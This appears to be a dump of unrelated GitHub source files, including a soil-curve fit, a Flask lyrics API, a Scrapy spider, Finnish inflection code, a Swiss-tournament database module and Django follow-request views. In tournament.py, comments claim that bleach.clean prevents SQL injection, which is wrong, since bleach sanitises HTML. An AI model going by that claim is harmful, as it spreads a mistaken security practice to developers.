(1/n)\n corlist.append(np.corrcoef(predpot_base,y)[0,1])\n bestN = nlist[np.argmax(corlist)]\n n = bestN\n m = 1 - 1/n\n predpot_base = -(xR ** (-1/m) - 1) ** (1/n)\n alphaI = np.std(predpot_base)/np.std(y)\n bestpar.append([bestN,alphaI])\nbestpar = np.array(bestpar)\n#%%\nti = 6\n\nx = smc[years==yearlist[ti]]\ny = psi[years==yearlist[ti]]\nsrange = np.arange(np.min(x)-0.01,np.max(x),0.005)\nrelsoil = np.clip((srange-s0)/(s1-s0),0.01,0.99)\nxR = np.clip((x-0.067)/(0.55-0.067),0.01,0.99)\nn,alphaI = bestpar[ti]\nn = 1.3\nm = 1 - 1/n\npredpot_base = -(xR ** (-1/m) - 1) ** (1/n)\nalphaI = np.std(predpot_base)/np.std(y)\npredpot_range = -(relsoil ** (-1/m) - 1) ** (1/n)\nplt.figure()\nplt.plot(x,y,\"o\")\nplt.plot(srange,predpot_range/alphaI)\n 
#plt.plot([0,-2],[0,-2])","repo_name":"natan-holtzman/CliMa_Microwave","sub_path":"data/fit_soil2.py","file_name":"fit_soil2.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"34142357946","text":"from flask import Flask,request,jsonify\nfrom bs4 import BeautifulSoup\nfrom app.utils.http import get_html,get_african_lyrics,get_countries\nfrom app.utils.config import AFRILYRICS_URL\nfrom logging import log\nfrom flask_cors import CORS, cross_origin\n\n\napp=Flask(__name__)\ncors = CORS(app)\napp.config['CORS_HEADERS'] = 'Content-Type'\n\n@cross_origin()\ndef index():\n html=get_html(AFRILYRICS_URL)\n soup=BeautifulSoup(html, 'html.parser')\n hot_row=[ i for i in soup.find(class_='item-info-overlay').findAll(class_='item') ]\n items=[]\n\n for item in hot_row:\n item_title=item.find(class_='item-title').findAll('a')[0]\n item_author=item.find(class_='item-author').findAll('a')[0]\n item_media=item.find(class_='item-media').findAll('a')[0]\n\n items.append({\n 'title':item_title.getText(),\n 'link':item_title['href'].replace('https://afrikalyrics.com',''),\n 'image':item_media['data-bg'],\n 'artist':{\n 'name':item_author.getText(),\n 'link':item_author['href'].replace('https://afrikalyrics.com','')\n }\n \n })\n\n response={}\n response['results']=items\n return jsonify(response)\n\n\n@cross_origin()\ndef artist(name):\n \"\"\" function to return artist info and songs lyrics \"\"\"\n \n return jsonify({'message':'working on this - will be available soon','url':f'/artist/{name}',})\n\n\n@cross_origin()\ndef get_country_list():\n \"\"\" get country list \"\"\"\n top_lyrics,result=get_countries()\n \n return jsonify({'result':result,'top_lyrics':top_lyrics})\n\n\n@cross_origin()\ndef get_song_lyrics(songlink):\n \"\"\" function to return song lyrics \"\"\"\n info,body=get_african_lyrics(songlink)\n\n results=[]\n\n results.append(\n {\n 'info':info,\n 'lyrics':body\n }\n )\n\n if body:\n return jsonify({'results':results})\n return jsonify({'message':'working on this - will be available soon','url':f'/artist/{songlink}',})\n\n\n\n\n\napp.add_url_rule('/','index',index)\napp.add_url_rule('/artist/','artist',artist)\napp.add_url_rule('/countries-list','country-list',get_country_list)\napp.add_url_rule('/','get-lyrics',get_song_lyrics)\n","repo_name":"itfidele/Afrikalyrics-API","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7168719197","text":"#!/usr/bin/python3\n#coding=utf-8\n\nimport json\nimport logging\nimport os\nimport decimal\n\nfrom datetime import datetime, date\n\nimport jsonschema\n\ndef json_encode_extra(obj):\n \"\"\"encoder for json.dump(s) with extra types support\"\"\"\n# return str(type(obj))\n if isinstance(obj, decimal.Decimal):\n return float(obj)\n elif isinstance(obj, datetime):\n return obj.isoformat()\n elif isinstance(obj, date):\n return obj.isoformat()\n raise TypeError(repr(obj) + \" is not JSON serializable\")\n\ndef load_json(path_json):\n \"\"\"loads json data from path, returns data or None when fails\"\"\"\n if not os.path.isfile(path_json):\n logging.exception(path_json + \" not found\")\n return None\n try:\n data = json.load(open(path_json))\n return data\n except Exception:\n logging.exception(\"Error loading \" + path_json)\n return None\n\ndef save_json(data, path_json):\n \"\"\"saves data to json 
file\"\"\"\n with open(path_json, 'w', encoding='utf-8') as file:\n json.dump(data, file, ensure_ascii=False)\n\ndef deep_copy_trunc(src, size_limit=1024):\n rslt = None\n if isinstance(src, dict):\n rslt = {}\n for key, val in src.items():\n rslt[key] = deep_copy_trunc(val, size_limit)\n elif isinstance(src, list):\n rslt = []\n for item in src:\n rslt.append(deep_copy_trunc(item, size_limit))\n elif isinstance(src, str):\n rslt = src if size_limit > 0 and len(src) < size_limit\\\n else src[:size_limit] + '_etc'\n else:\n rslt = src\n return rslt\n \nclass JSONvalidator:\n\n def __init__(self, schemas):\n self._schemas = schemas\n\n def validate(self, schema, data):\n try:\n jsonschema.validate(deep_copy_trunc(data), self._schemas[schema])\n return True\n except jsonschema.exceptions.ValidationError as exc:\n logging.error('Error validating json data. Schema: ' + schema)\n logging.exception(exc)\n return False\n","repo_name":"alexbzg/cfmrda-back","sub_path":"cfmrda/json_utils.py","file_name":"json_utils.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26804519304","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Feb 12 21:21:59 2018\r\n\r\n@author: Ruby\r\n\"\"\"\r\n\r\n #'text': list.xpath('//div[@id=\"content\"]/table[2]/tr[1]/td')[0].extract()\r\n\r\nfrom __future__ import absolute_import\r\nimport scrapy\r\nimport re\r\nfrom cropView.items import CropviewItem\r\n\r\nclass CropViewSpider(scrapy.Spider):\r\n\r\n name = \"cropviewspider\"\r\n start_urls = [ \"http://ecocrop.fao.org/ecocrop/srv/en/cropView?id=289\"]\r\n custom_settings = {\r\n # specifies exported fields and order\r\n 'FEED_EXPORT_FIELDS': [\"CropID\",\"SciName\", \"Info\"],\r\n }\r\n \r\n def parse(self, response): \r\n \r\n #for list in response.css('.serviceLink'):\r\n #link = list.css('::attr(onclick)')\r\n #id = re.findall(r'\\d+', link.extract()[0])[0]\r\n \r\n #yield response.follow(\"http://ecocrop.fao.org/ecocrop/srv/en/cropView?id=\" + id, self.parse_data)\r\n yield response.follow(\"http://ecocrop.fao.org/ecocrop/srv/en/cropView?id=289\", self.parse_data) \r\n \r\n def parse_data(self, response):\r\n \r\n item = CropviewItem() \r\n \r\n DataLink = response.css('.switchView').css('::attr(href)').extract()[0]\r\n DataLink = re.findall(r'\\d+', DataLink)[0]\r\n item['CropID'] = DataLink \r\n item['SciName'] = response.xpath('//div[@id=\"content\"]/h2/text()').extract_first()\r\n item['Info'] = response.xpath('//div[@id=\"content\"]/table[2]/tr[1]/td/text()')[0].extract()\r\n yield item","repo_name":"Rubsy777/Text-Mining","sub_path":"Scrapy/cropView/cropView/spiders/cropViewSpy.py","file_name":"cropViewSpy.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31633653040","text":"from .base import *\nfrom .kotus_noun_13_katiska import kotus_noun_13_katiska\n\ndef kotus_noun_16_vanhempi(word, gradation_fn = identity):\n # suffix\n def s(text): return change_to_same_vowel_group_prefer_umlauts(word, text)\n\n word_alt = gradation_fn(word)\n\n # all words in this class end in \"a\" or \"ä\"\n (root, end_vowel) = reverse_parse(word, root_and_end_vowel)\n (root_alt, _) = reverse_parse(word_alt, root_and_end_vowel)\n v = end_vowel\n\n reference = kotus_noun_13_katiska(word, gradation_fn)\n return reference._replace(nominative_plural = root_alt + s(\"at\"),\n genitive = root_alt + s(\"an\"),\n 
genitives_plural = [root + s(\"ien\"),\n root + s(\"ain\")],\n partitives = [root + s(\"aa\")],\n partitives_plural = [root + s(\"ia\")],\n accusatives = [word,\n root_alt + s(\"an\")],\n accusative_plural = root_alt + s(\"at\"),\n inessive = root_alt + s(\"assa\"),\n inessives_plural = [root_alt + s(\"issa\")],\n elative = root_alt + s(\"asta\"),\n elatives_plural = [root_alt + s(\"ista\")],\n illatives = [root + s(\"aan\")],\n illatives_plural = [root + s(\"iin\")],\n adessive = root_alt + s(\"alla\"),\n adessives_plural = [root_alt + s(\"illa\")],\n ablative = root_alt + s(\"alta\"),\n ablatives_plural = [root_alt + s(\"ilta\")],\n allative = root_alt + s(\"alle\"),\n allatives_plural = [root_alt + s(\"ille\")],\n essives = [root + s(\"ana\")],\n essives_plural = [root + s(\"ina\")],\n translative = root_alt + s(\"aksi\"),\n translatives_plural = [root_alt + s(\"iksi\")],\n abessive = root_alt + s(\"atta\"),\n abessives_plural = [root_alt + s(\"itta\")],\n instructives_plural = [root_alt + s(\"in\")],\n comitatives_plural = [root + s(\"ine\")],)\n","repo_name":"sp3ctum/plover-finnish","sub_path":"stroke_dictionary_creator/stroke_dictionary_creator/inflection/roots/inflection_types/kotus_noun_16_vanhempi.py","file_name":"kotus_noun_16_vanhempi.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"29648502979","text":"def transform(legacy_data):\n\n # initialize a new dictionary to store the new data system\n new_data = {}\n\n for score in legacy_data:\n # for each letter in each score\n for letter in legacy_data[score]:\n new_data[letter.lower()] = score\n\n return new_data\n","repo_name":"PedroGF45/Exercism","sub_path":"python/etl/etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73751146679","text":"#!/usr/bin/env python\n#\n# tournament.py -- implementation of a Swiss-system tournament\n#\n\nimport psycopg2\nimport bleach\n\ndef connect():\n \"\"\"Connect to the PostgreSQL database. Returns a database connection.\"\"\"\n return psycopg2.connect(\"dbname=tournament\")\n\ndef execute_query(sql_query, parameters=[]):\n \"\"\"Executes query. Useful when no records need to be fetched.\n\n Args:\n sql_query: query to execute\n parameters: (optional) list containing paramaters to pass to query. Set to\n an empty list by default.\n \"\"\"\n\n conn = connect()\n cur = conn.cursor()\n cur.execute(sql_query, parameters)\n cur.close()\n conn.commit()\n conn.close()\n\n\ndef execute_query_fetchall(sql_query, parameters=[]):\n \"\"\"Executes a query, and then fetches the result of query. The results are\n then returned to the caller.\n\n Args:\n sql_query: query to execute\n parameters: (optional) list containing paramaters to pass to query. 
Set to\n an empty list by default.\n \"\"\"\n\n conn = connect()\n cur = conn.cursor()\n cur.execute(sql_query, parameters)\n result = cur.fetchall()\n cur.close()\n conn.commit()\n conn.close()\n\n return result\n\n\ndef deleteMatches(tournament=0):\n \"\"\"Remove all the match records from the database for the specified tournament.\n\n Args:\n tournament: (optional) specifies which tournament to delete.\n Specify 0 to delete the most recent tournament.\n Specify -1 to delete all tournaments.\n Defaults to 0 if not specified.\n \"\"\"\n sql_query = \"\" # will specify query to execute\n parameters = []\n if tournament == 0:\n sql_query = \"DELETE FROM tournament_matches WHERE tournament_id = \\\n (SELECT MAX(tournament_id) FROM tournament_matches);\"\n elif tournament == -1:\n sql_query = \"DELETE FROM tournament_matches;\"\n else:\n sql_query = \"DELETE FROM tournament_matches WHERE tournament_id = %s;\"\n parameters = [bleach.clean(tournament)]\n\n execute_query(sql_query, parameters)\n\n\ndef deletePlayers(tournament=0):\n \"\"\"Remove all the player records from the database for the specified tournament.\n If a player is no longer registered for any tournaments, the player will\n also be deleted from master player table.\n\n Args:\n tournament: (optional) specifies which tournament to delete players from.\n Specify 0 to delete player data from the most recent tournament.\n Specify -1 to delete all player data in all tournaments.\n Defaults to 0 if not specified.\n \"\"\"\n sql_query = \"\" # will specify query to execute\n parameters = []\n # Delete players from tournament registry\n if tournament == 0:\n sql_query = \"DELETE FROM tournament_roster WHERE tournament_id = \\\n (SELECT MAX(tournament_id) FROM tournament_roster);\"\n elif tournament == -1:\n sql_query = \"DELETE FROM tournament_roster; DELETE FROM players;\"\n else:\n sql_query = \"DELETE FROM tournament_roster WHERE tournament_id = %s;\"\n parameters = [bleach.clean(tournament)]\n\n # Delete players from player table if they are no longer registered for any tournaments\n sql_query += \"DELETE FROM players WHERE player_id NOT IN (SELECT player_id FROM tournament_roster);\"\n\n execute_query(sql_query, parameters)\n\n\ndef countPlayers(tournament=0):\n \"\"\"Returns the number of players currently registered in the specified tournament.\n\n Args:\n tournament: (optional) specifies which tournament to count the players from.\n Specify 0 to count the players in the most recent tournament.\n Specify -1 to count all players in all tournaments. Each player is\n only counted once, regardless of number of tournaments entered.\n Defaults to 0 if not specified.\n \"\"\"\n\n sql_query = \"\" # will specify query to execute\n parameters = []\n if tournament == 0:\n sql_query = \"SELECT count(*) FROM tournament_roster WHERE tournament_id = \\\n (SELECT MAX(tournament_id) FROM tournament_roster);\"\n elif tournament == -1:\n sql_query = \"SELECT count(*) FROM players;\"\n else:\n sql_query = \"SELECT count(*) FROM tournament_roster WHERE tournament_id = %s;\"\n parameters = [bleach.clean(tournament)]\n\n return execute_query_fetchall(sql_query, parameters)[0][0]\n\ndef registerPlayer(name, tournament=0, player_id=0):\n \"\"\"Adds a player to the tournament database and assigns player to the specified\n tournament.\n\n The database assigns a unique serial id number for the player. 
(This\n should be handled by your SQL database schema, not in your Python code.)\n\n Returns:\n A dictionary with:\n player_id: An integer storing the player's id. This can be used for\n registering the player in future tournaments.\n tournament: An integer representing the tournament id the player is registered\n for. This can be used to register other players in the same\n tournament.\n\n Args:\n name: the player's full name (need not be unique).\n tournament: (optional) specifies which tournament to register the player for.\n Specify 0 to register the player for the next tournament.\n Defaults to 0 if not specified.\n player_id: (optional) if the player has registered for a previous tournament,\n they can register for a new tournament with their player_id. If a\n player_id is specified, the player is added to the tournament without\n creating a new player record. A player_id of 0 means the player is\n new and needs to be created. Defaults to 0.\n \"\"\"\n\n # if player_id is 0, create the new player and get the player's id\n if player_id == 0:\n player_id = execute_query_fetchall(\"INSERT INTO players (name) VALUES (%s) RETURNING player_id\", [name])[0][0]\n\n \"\"\" if tournament = 0, add the player to the next tournament, which will be after\n the latest tournament\n \"\"\"\n if tournament == 0:\n last_tournament = execute_query_fetchall(\"SELECT MAX(tournament_id) FROM tournament_matches\")[0][0]\n tournament = int(0 if last_tournament is None else last_tournament) + 1\n\n execute_query(\"INSERT INTO tournament_roster (tournament_id, player_id, had_bye) VALUES (%s, %s, FALSE)\",\n [bleach.clean(tournament), bleach.clean(player_id)])\n\n return {'player_id': player_id, 'tournament': tournament}\n\ndef playerStandings(tournament=0):\n \"\"\"Returns a list of the players and their win records for a specified tournament.\n Sorted based on winning percentage. A draw counts as 1/2 a win. Due to the output\n expected by the test cases, draw data is not included in the output, however it is\n used for sorting the players.\n\n The first entry in the list should be the player in first place, or a player\n tied for first place if there is currently a tie.\n\n Returns:\n A list of tuples, each of which contains (id, name, wins, matches):\n id: the player's unique id (assigned by the database)\n name: the player's full name (as registered)\n wins: the number of matches the player has won.\n matches: the number of matches the player has played\n\n Args:\n tournament: (optional) specifies which tournament to get the standings for.\n Specify 0 to get the results of the most recent tournament.\n Defaults to 0 if not specified.\n \"\"\"\n # if tournament is 0, get the latest tournament\n if tournament == 0:\n tournament = int(execute_query_fetchall(\"SELECT MAX(tournament_id) FROM tournament_roster\")[0][0])\n\n sql_query = \"SELECT pr.player_id, p.name, pr.wins, pr.matches FROM player_rankings pr, players p \\\n WHERE pr.tournament_id = %s AND pr.player_id = p.player_id ORDER BY pr.points DESC\"\n\n return execute_query_fetchall(sql_query, [bleach.clean(tournament)])\n\ndef reportMatch(winner, loser, draw=False, tournament=0):\n \"\"\"Records the outcome of a single match between two players.\n\n Args:\n winner: the id number of the player who won. *(see note regarding draws below)\n loser: the id number of the player who lost. 
*(see note regarding draws below)\n draw: (optional) specifies if the match was a draw.\n tournament: (optional) specifies which tournament the match was played in.\n Specify 0 to report a match for the most recent tournament.\n Defaults to 0 if not specified.\n\n Note:\n * If the match is a draw, the args 'winner' and 'loser' are just used to identify\n the two different players. The result will be recorded as a draw for both players,\n rather than a win or loss.\n \"\"\"\n\n # if tournament is 0, get the latest tournament\n if tournament == 0:\n tournament = int(execute_query_fetchall(\"SELECT MAX(tournament_id) FROM tournament_roster\")[0][0])\n\n # ensure input values are clean to prevent SQL Injection attacks\n winner = bleach.clean(winner)\n loser = bleach.clean(loser)\n tournament = bleach.clean(tournament)\n\n if draw:\n execute_query(\"INSERT INTO tournament_matches (player1_id, player2_id, draw, tournament_id) \\\n VALUES (%s, %s, TRUE, %s)\", [winner, loser, tournament])\n else:\n execute_query(\"INSERT INTO tournament_matches (player1_id, player2_id, draw, winner_id, tournament_id) \\\n VALUES (%s, %s, FALSE, %s, %s)\", [winner, loser, winner, tournament])\n\ndef swissPairings(tournament=0):\n \"\"\"Returns a list of pairs of players for the next round of a match.\n\n Assuming that there are an even number of players registered, each player\n appears exactly once in the pairings. Each player is paired with another\n player with an equal or nearly-equal win record, that is, a player adjacent\n to him or her in the standings.\n\n If there are an odd number of players, one player will receive a bye, which will\n count as an automatic win. A player may only receive one bye per tournament.\n\n Returns:\n A list of tuples, each of which contains (id1, name1, id2, name2)\n id1: the first player's unique id\n name1: the first player's name\n id2: the second player's unique id. Set to 0 in the case of a bye.\n name2: the second player's name. Set to 'Bye' in the case of a bye.\n\n Args:\n tournament: (optional) specifies which tournament to get the standings for.\n Specify 0 to get the results of the most recent tournament.\n Defaults to 0 if not specified.\n\n \"\"\"\n # if tournament is 0, get the latest tournament\n if tournament == 0:\n tournament = int(execute_query_fetchall(\"SELECT MAX(tournament_id) FROM tournament_roster\")[0][0])\n\n # ensure input data is clean to prevent SQL injection attacks\n tournament = bleach.clean(tournament)\n \n standings = playerStandings(tournament)\n pairings = []\n\n # Check if we have an odd number of players. 
If so, randomly give a player a bye.\n # Only players who have not yet had a bye are eligible.\n if len(standings) % 2 == 1:\n sql_query = \"SELECT p.player_id, p.name FROM tournament_roster tr, players p \\\n WHERE tr.tournament_id = %s AND NOT had_bye AND tr.player_id = p.player_id \\\n ORDER BY RANDOM() LIMIT 1\"\n results = execute_query_fetchall(sql_query, [tournament])\n bye_player_id = results[0][0]\n bye_player_name = results[0][1]\n for player in standings:\n if bye_player_id == player[0]:\n pairings.append((bye_player_id, bye_player_name, 0, \"BYE\"))\n standings.remove(player)\n break\n\n pairings.extend([(standings[i][0], standings[i][1], standings[i+1][0], standings[i+1][1]) for i in range(0,len(standings),2)])\n\n return pairings\n","repo_name":"cacrookes/udacity-fsd-proj2","sub_path":"tournament.py","file_name":"tournament.py","file_ext":"py","file_size_in_byte":12036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10789106655","text":"# Time: O(1)\n# Space: O(1)\n\nclass Solution(object):\n def findIntegers(self, num):\n \"\"\"\n :type num: int\n :rtype: int\n \"\"\"\n dp = [0] * 32\n dp[0], dp[1] = 1, 2\n for i in xrange(2, len(dp)):\n dp[i] = dp[i-1] + dp[i-2]\n result, prev_bit = 0, 0\n for i in reversed(xrange(31)):\n if (num & (1 << i)) != 0:\n result += dp[i]\n if prev_bit == 1:\n result -= 1\n break\n prev_bit = 1\n else:\n prev_bit = 0\n return result + 1\n\n","repo_name":"kamyu104/LeetCode-Solutions","sub_path":"Python/non-negative-integers-without-consecutive-ones.py","file_name":"non-negative-integers-without-consecutive-ones.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":4314,"dataset":"github-code","pt":"40"} +{"seq_id":"11762997102","text":"from django.shortcuts import render\nfrom datetime import datetime\n# Create your views here.\n\n\ndef prd(request):\n add = ['Cumberland', 'Hyatt Churchil', 'Hilton London on Park Lane', 'Amba Marble Arch',\n 'Corus Hyde Park', 'Bayswater Hotel', 'Royal National London']\n htl = 'Add Hotel/Service Apartment/Lodge/B&B'\n att = 'Add Attraction'\n tic = 'Add Tickets'\n trf = 'Add Transfers'\n d = datetime.now()\n prd_detail = {'ht':htl, 'at':att, 'ti': tic, 'tr': trf, 'dt': d, 'ads':add}\n return render(request, 'products/prd.html', context=prd_detail)\n\n\ndef hotel(request):\n return render(request, 'products/hotel.html')\n","repo_name":"rishipalsingh9/portfolio1","sub_path":"django-projects/europeous/products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34554683690","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nimport json\n\nfrom user.models import User\nfrom .models import FollowRequest, FollowList\n\n\ndef follow_list_view(request, *args, **kwargs):\n\tcontext = {}\n\tuser = request.user\n\tif user.is_authenticated:\n\t\tuser_id = kwargs.get(\"user_id\")\n\t\tif user_id:\n\t\t\ttry:\n\t\t\t\tthis_user = User.objects.get(pk=user_id)\n\t\t\t\tcontext['this_user'] = this_user\n\t\t\texcept User.DoesNotExist:\n\t\t\t\treturn HttpResponse(\"That user does not exist\")\n\t\t\ttry:\n\t\t\t\tfollow_list = FollowList.objects.get(user=this_user)\n\t\t\texcept FollowList.DoesNotExist:\n\t\t\t\treturn HttpResponse(f\"Could not find a follow list for {this_user.username}\")\n\n\t\t\t# Must be following or followed by this user to view the list\n\t\t\tif user != 
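# --- Editor's illustration (not part of tournament.py): the pairing step above walks
# the standings two at a time after extracting an optional bye. A minimal standalone
# sketch of the same Swiss-pairing idea on plain tuples; all data here is hypothetical.
def swiss_pairs(standings):
    """standings: list of (player_id, name) ordered best to worst; len must be even."""
    return [(standings[i][0], standings[i][1], standings[i + 1][0], standings[i + 1][1])
            for i in range(0, len(standings), 2)]

demo = [(1, "Ada"), (2, "Grace"), (3, "Edsger"), (4, "Barbara")]
# Adjacent players in the standings meet each other: Ada-Grace, Edsger-Barbara.
assert swiss_pairs(demo) == [(1, "Ada", 2, "Grace"), (3, "Edsger", 4, "Barbara")]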
this_user:\n\t\t\t\tif not (user in follow_list.following.all() or user in follow_list.follower.all()):\n\t\t\t\t\treturn HttpResponse(\"You must be related to view their follow listings\")\n\t\t\tfollowings = [] # [(following1, True), (following2, False), ...]\n\t\t\tfollowers = []\n\t\t\t# get the authenticated user's following list\n\t\t\tauth_user_follow_list = FollowList.objects.get(user=user)\n\t\t\tfor following in follow_list.following.all():\n\t\t\t\tfollowings.append((following, auth_user_follow_list.is_following(following)))\n\t\t\tfor follower in follow_list.follower.all():\n\t\t\t\tfollowers.append((follower, auth_user_follow_list.is_follower(follower)))\n\t\t\tcontext['followings'] = followings\n\t\t\tcontext['followers'] = followers\n\telse:\n\t\treturn HttpResponse(\"You must be related to view their follow listings\")\n\treturn render(request, \"follow/follow_list.html\", context)\n\n\ndef follow_requests(request, *args, **kwargs):\n\tcontext = {}\n\tuser = request.user\n\tif user.is_authenticated:\n\t\tuser_id = kwargs.get(\"user_id\")\n\t\taccount = User.objects.get(pk=user_id)\n\t\tif account == user:\n\t\t\tfollow_requests = FollowRequest.objects.filter(receiver=account, is_active=True)\n\t\t\tcontext['follow_requests'] = follow_requests\n\t\telse:\n\t\t\treturn HttpResponse(\"You can't view another user's follow requests\")\n\telse:\n\t\treturn redirect(\"login\")\n\treturn render(request, \"follow/follow_requests.html\", context)\n\n\ndef send_follow_request(request, *args, **kwargs):\n\tuser = request.user\n\tpayload = {}\n\tif request.method == \"POST\" and user.is_authenticated:\n\t\tuser_id = request.POST.get(\"receiver_user_id\")\n\t\tif user_id:\n\t\t\treceiver = User.objects.get(pk=user_id)\n\t\t\ttry:\n\t\t\t\t# Get any follow requests (active and not-active)\n\t\t\t\tfollow_requests = FollowRequest.objects.filter(sender=user, receiver=receiver)\n\t\t\t\t# find if any of them are active (pending)\n\t\t\t\ttry:\n\t\t\t\t\tfor request in follow_requests:\n\t\t\t\t\t\tif request.is_active:\n\t\t\t\t\t\t\traise Exception(\"You already sent them a request\")\n\t\t\t\t\t# If none are active create a new follow request\n\t\t\t\t\tfollow_request = FollowRequest(sender=user, receiver=receiver)\n\t\t\t\t\tfollow_request.save()\n\t\t\t\t\tpayload['response'] = \"Request sent\"\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tpayload['response'] = str(e)\n\t\t\texcept FollowRequest.DoesNotExist:\n\t\t\t\t# There are no requests so create one.\n\t\t\t\tfollow_request = FollowRequest(sender=user, receiver=receiver)\n\t\t\t\tfollow_request.save()\n\t\t\t\tpayload['response'] = \"Request sent\"\n\n\t\t\tif payload.get('response') is None:\n\t\t\t\tpayload['response'] = \"Something went wrong\"\n\t\telse:\n\t\t\tpayload['response'] = \"Unable to send a request\"\n\telse:\n\t\tpayload['response'] = \"You must be authenticated to send a request\"\n\treturn HttpResponse(json.dumps(payload), content_type=\"application/json\")\n\n\ndef accept_follow_request(request, *args, **kwargs):\n\tuser = request.user\n\tpayload = {}\n\tif request.method == \"GET\" and user.is_authenticated:\n\t\tfollow_request_id = kwargs.get(\"follow_request_id\")\n\t\tif follow_request_id:\n\t\t\tfollow_request = FollowRequest.objects.get(pk=follow_request_id)\n\t\t\t# confirm that is the correct request\n\t\t\tif follow_request.receiver == user:\n\t\t\t\tif follow_request:\n\t\t\t\t\t# found the request. 
Now accept it\n\t\t\t\t\tupdated_notification = follow_request.accept()\n\t\t\t\t\tpayload['response'] = \"Request accepted\"\n\n\t\t\t\telse:\n\t\t\t\t\tpayload['response'] = \"Something went wrong\"\n\t\t\telse:\n\t\t\t\tpayload['response'] = \"That is not your request to accept\"\n\t\telse:\n\t\t\tpayload['response'] = \"Unable to accept that request\"\n\telse:\n\t\t# should never happen\n\t\tpayload['response'] = \"You must be authenticated to accept a request\"\n\treturn HttpResponse(json.dumps(payload), content_type=\"application/json\")\n\n\ndef remove_follower(request, *args, **kwargs):\n\tuser = request.user\n\tpayload = {}\n\tif request.method == \"POST\" and user.is_authenticated:\n\t\tuser_id = request.POST.get(\"receiver_user_id\")\n\t\tif user_id:\n\t\t\ttry:\n\t\t\t\t# the follower identified by user_id stops following the authenticated user\n\t\t\t\tremovee = User.objects.get(pk=user_id)\n\t\t\t\tfollow_list = FollowList.objects.get(user=removee)\n\t\t\t\tfollow_list.unfollow(user)\n\t\t\t\tpayload['response'] = \"Successfully removed that follower\"\n\t\t\texcept Exception as e:\n\t\t\t\tpayload['response'] = f\"Something went wrong: {str(e)}\"\n\t\telse:\n\t\t\tpayload['response'] = \"There was an error. Unable to remove that follower\"\n\telse:\n\t\t# should never happen\n\t\tpayload['response'] = \"You must be authenticated to remove a follower\"\n\treturn HttpResponse(json.dumps(payload), content_type=\"application/json\")\n\ndef remove_following(request, *args, **kwargs):\n\tuser = request.user\n\tpayload = {}\n\tif request.method == \"POST\" and user.is_authenticated:\n\t\tuser_id = request.POST.get(\"receiver_user_id\")\n\t\tif user_id:\n\t\t\ttry:\n\t\t\t\tremovee = User.objects.get(pk=user_id)\n\t\t\t\tfollow_list = FollowList.objects.get(user=user)\n\t\t\t\tfollow_list.unfollow(removee)\n\t\t\t\tpayload['response'] = \"Successfully removed you as follower\"\n\t\t\texcept Exception as e:\n\t\t\t\tpayload['response'] = f\"Something went wrong: {str(e)}\"\n\t\telse:\n\t\t\tpayload['response'] = \"There was an error. Unable to remove you as follower\"\n\telse:\n\t\t# should never happen\n\t\tpayload['response'] = \"You must be authenticated to remove yourself as follower\"\n\treturn HttpResponse(json.dumps(payload), content_type=\"application/json\")\n\n\n\ndef decline_follow_request(request, *args, **kwargs):\n\tuser = request.user\n\tpayload = {}\n\tif request.method == \"GET\" and user.is_authenticated:\n\t\tfollow_request_id = kwargs.get(\"follow_request_id\")\n\t\tif follow_request_id:\n\t\t\tfollow_request = FollowRequest.objects.get(pk=follow_request_id)\n\t\t\t# confirm that is the correct request\n\t\t\tif follow_request.receiver == user:\n\t\t\t\tif follow_request:\n\t\t\t\t\t# found the request. 
Now decline it\n\t\t\t\t\tupdated_notification = follow_request.decline()\n\t\t\t\t\tpayload['response'] = \"Request declined\"\n\t\t\t\telse:\n\t\t\t\t\tpayload['response'] = \"Something went wrong\"\n\t\t\telse:\n\t\t\t\tpayload['response'] = \"That is not your request to decline\"\n\t\telse:\n\t\t\tpayload['response'] = \"Unable to decline that request\"\n\telse:\n\t\t# should never happen\n\t\tpayload['response'] = \"You must be authenticated to decline a request\"\n\treturn HttpResponse(json.dumps(payload), content_type=\"application/json\")\n\n\n\n\ndef cancel_follow_request(request, *args, **kwargs):\n\tuser = request.user\n\tpayload = {}\n\tif request.method == \"POST\" and user.is_authenticated:\n\t\tuser_id = request.POST.get(\"receiver_user_id\")\n\t\tif user_id:\n\t\t\treceiver = User.objects.get(pk=user_id)\n\t\t\ttry:\n\t\t\t\tfollow_requests = FollowRequest.objects.filter(sender=user, receiver=receiver, is_active=True)\n\t\t\texcept FollowRequest.DoesNotExist:\n\t\t\t\tpayload['response'] = \"Nothing to cancel. Request does not exist\"\n\n\t\t\t# There should only ever be ONE active follow request at any given time. Cancel them all just in case.\n\t\t\tif len(follow_requests) > 1:\n\t\t\t\tfor request in follow_requests:\n\t\t\t\t\trequest.cancel()\n\t\t\t\tpayload['response'] = \"Request canceled\"\n\t\t\telse:\n\t\t\t\t# found the request. Now cancel it\n\t\t\t\tfollow_requests.first().cancel()\n\t\t\t\tpayload['response'] = \"Request canceled\"\n\t\telse:\n\t\t\tpayload['response'] = \"Unable to cancel that request\"\n\telse:\n\t\t# should never happen\n\t\tpayload['response'] = \"You must be authenticated to cancel a request\"\n\treturn HttpResponse(json.dumps(payload), 